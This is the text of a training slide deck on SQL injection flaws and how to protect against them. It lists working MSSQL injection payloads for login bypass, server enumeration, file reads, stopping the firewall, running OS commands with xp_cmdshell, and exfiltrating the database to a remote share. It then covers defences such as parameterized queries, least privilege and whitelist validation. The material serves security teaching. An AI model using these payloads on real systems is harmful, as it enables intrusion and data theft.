A1 Injection Flaws
Problem and Protection
Little Bobby Tables
update students set (name) = (' _____ ') where studentID = 33342;
Injection Flaws
o SQL injections occur when the attacker forces statements into the http request in such a way that his SQL statements are run against the database
How attackers do it
1. They find a vulnerable site
2. They type in SQL statements into textboxes, URLs, or inject them into other field forms using a request manipulator like Fiddler
How attackers do it
o The attackers injection may look like this: 12; update orders set amtDue=0 where orderID=1234; --
o And the code that runs it might look like this: string sql = "SELECT catID FROM items WHERE prodID = " + txtProdID.Text; var cmd = new SqlCommand(sql, myConn); var categoryID = cmd.ExecuteScalar();
o So the resulting SQL run would look like this: select catID from items where prodID = 12; update orders set amtDue=0 where orderID=1234;
How to break in without a password
o Scenario: textboxes for username/password
o Injection: admin' OR 1=1--
o Resulting SQL: select userID from user where username = 'admin' OR 1=1 --' and password = '';
How to gather intel about the installation
SQL attack vector Data gathered 0; select @@version; -- Database version
0; select @@servername ; -- Actual server name
0; select @@microsoftversion ; -- OS name and version 0; select * from master..sysservers ; -- List of other servers 0; select * from sysusers ; -- All user accounts
How to get a list of tables
0; SELECT so.name, MAX(si.rows) AS numrows FROM sys.sysobjects AS so INNER JOIN sys.sysindexes AS si ON OBJECT_ID(so.name) = si.id WHERE (so.xtype = 'U') GROUP BY so.name; --
Employees 9 EmployeeTerritories 49 OrderDetails 2155 OrderPayment 1 Orders 830 Products 77 Region 4 Shipment 1 Shippers 3
How to get a table's structure 0; exec sp_columns refundsToProcess; --
How to set a value in a table
0; insert into refundsToProcess (amount, custID, approved) values (932.45, 11234, true); --
How to read files from the hard drives or network
0; create table myfile (line varchar(8000)); bulk insert myfile from 'c:\inetpub\wwwroot\web.config'; select * from myfile; --
How to start and stop OS Services 0; EXEC xp_servicecontrol stop Firewall; -- 0; EXEC xp_servicecontrol start telnet; --
How to run OS commands
0; exec master..xp_cmdshell 'reg.exe ADD HKLM\Software\HackersAreUs /v NoAuth /t REG_BINARY /d 0001 '; --
How to steal the whole doggone database!
0; backup database master to disks='\\{IP}\{sharename}\backupdb.dat'; --
How to vacation offshore after pwning
us
How we protect ourselves
o Use parameterized statements o Use stored procedures o Enforce least privilege o Validate the input via whitelist
Use parameterized statements
o Single best thing to do o All other methods can help o Only this one will halt the attack by itself o It's the parameters that fix the issue
Use parameterized queries var cmd = new SqlCommand("select count(*) from users where userID = @userID and pwd = @pwd", myConn); cmd.Parameters.Add( new SqlParameter("@userID",SqlDbType.NVarChar,10)); cmd.Parameters["@userID"].Value = txtUserID.Text; cmd.Parameters.Add( new SqlParameter("@pwd",SqlDbType.NVarChar,128)); cmd.Parameters["@pwd"].Value = txtPassword.Text; if (Convert.ToInt16(cmd.ExecuteScalar()) == 0) throw new Exception("No dice, chief.");
ORMs and injection attacks
o ORMs like • NHibernate • LINQ • Entity Framework
o Uses parameterized queries natively
o So use an ORM and you're all set!
Use stored procedures o Stored procedures make it tougher for attackers to inject
sql because procedures are by definition limited to certain activities
CREATE procedure OrderItem( @CustomerID nchar(5), @ProductID int, @Quantity int, @OrderID int OUT ) as declare @UnitPrice money --First, get Unit Price for the Item sold set @UnitPrice = (select UnitPrice from Products where ProductID = @ProductID); --Create the order header and get the orderID insert into Orders ( CustomerID, OrderDate, RequiredDate, ShipVia) values (@CustomerID, getdate(), DateAdd(Day, 7, getdate()), 3); set @OrderID = @@IDENTITY; --Add Order Detail Row insert into [Order Details] ( OrderID, ProductID, UnitPrice, Quantity) values (@OrderID, @ProductID, @UnitPrice, @Quantity); go
Stored procedures can be vulnerable
o Example: alter procedure DoGenericQuery @query nvarchar(255) as exec sp_executesql @query go
o This would run ANY other query o Stay vigilant with procedures
Enforce least privilege
o For all RDBMS activities, use DB users vs. Windows users
o For that DB user, remove all privileges (read, write, modify, grant, deny) on every entity (table, view, procedure, function) until it can be proven that the user needs that privilege
o Basically whitelist instead blacklist privileges o If this user needs to read X columns from a
table, create a view with only those X columns. Grant privilege on that view and deny it on the table
Validate data via a whitelist
o Test the data being input to make sure that it matches a pattern
o If it doesn't match a pattern, we reject it via a graceful error message
o Pattern = RegEx (___________ _________)
Why not a blacklist?
o You cannot possibly predict all of the possible ways that an attacker will get around our filter
o As in most things in life, where there are only a couple of ways to get something right, there are a near infinite number of ways to do it wrong
Why not a blacklist?
o Example: o You blacklist single quotes and semicolons o Attacker simply types in ... pass concat(char(39), char(32), char(111), char(114), char(32), char(49), char(61), char(49))
o which is ... pass' or 1=1
How to whitelist
o Specify only the patterns that you will allow Description Regular Expression Safe text. Letters, numbers, whitespace, dots, & dashes only.
^[a-zA-Z0-9\s.\-]+$
Social Security number ^\d{3}-\d{2}-\d{4}$ One of the 50 states ^(AL|AK|AZ|AR|CA|CO|...|TX|UT|VA|
WA|WV|WI|WY)$
US telephone number ^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$
Credit card number ^((4\d{3})|(5[1-5]\d{2})|(6011)|(7\d{3}))-?\d{4}-?\d{4}-?\d{4}|3[4,7]\d{13}$
How to whitelist
string whitelist = @"^\d{3}-\d{2}-\d{4}$"; if (! new Regex(whitelist).IsMatch(txtSSN.Text)) throw new Exception("Quit that hacking!");
o Note the @-sign. Needed because ______
Summary
o If the opportunity to inject SQL into our pages is present, attackers can inflict extremely serious and irreparable harm to our organization
o This is the top-rated web vulnerability known to man
o It can be mitigated by: • Whitelisting user input • Using stored procedures • Enforcing least privilege • Using parameterized statements
p.s. Not just SQL Injections
o Injection attack vectors include: • OS commands • HTML injections • LDAP injections • XML/XPath/XSLT
o The solutions are the same as for SQL, though
Further study
o Pocket guide to web security: • http://amzn.to/PocketGuideWebSecurity
o Very thorough reference on injection attacks: o http://bit.ly/InjectionAttackReference
o Tricks on overcoming blacklist filters: o http://bit.ly/OvercomingBlacklists
o List of SQL injection attack vectors: o http://bit.ly/SQLInjectionCheatSheet
Top Related